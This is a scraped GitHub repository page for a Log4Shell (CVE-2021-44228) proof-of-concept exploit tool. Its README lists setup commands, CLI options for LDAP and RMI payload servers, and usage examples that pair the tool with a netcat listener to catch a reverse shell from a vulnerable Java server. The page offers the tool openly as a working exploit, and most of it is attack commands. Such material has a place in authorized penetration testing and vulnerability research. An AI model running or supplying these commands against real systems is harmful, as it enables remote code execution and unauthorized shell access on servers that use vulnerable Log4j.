Skip to content

shoxxdj/log4shellExploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Log4shell POC

[!] CVE: CVE-2021-44228

[!] Based on https://github.com/kozmer/log4j-shell-poc

[!] And https://www.veracode.com/blog/research/exploiting-jndi-injections-java

[!] And https://github.com/cyberxml/log4j-poc

[!] But with poetry and simple to run :) by @shoxxdj

Usage :

First time, run the run_me_first.sh script.

./run_me_first.sh
poetry install
poetry run log4shell --userip listenerIP --lport netcatPort

Options :

Log4Shell Exploit Tool

options:
  -h, --help         show this help message and exit
  --userip USERIP    Enter IP for LDAPRefServer & Shell
  --webport WEBPORT  listener port for HTTP port
  --rmiport RMIPORT  listener port for RMI server
  --lport LPORT      Netcat Port
  --ljava LJAVA      Local Java Binaries Location
  --gen GEN          Generate multiple payloads
  --method METHOD    LDAP or RMI or all
  --references       Print references

Examples :

Ldap server

Shell1:
  poetry run log4shell --userip X.X.X.X --lport 1337 --method ldap
Shell2:
 nc -lvp 1337

Rmi server

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --method rmi
Shell2:
 nc -lvp 1337

Rmi with custom port:

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --rmiport 7777 --method rmi
Shell2:
 nc -lvp 1337

About

A simple Exploit for log4shell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •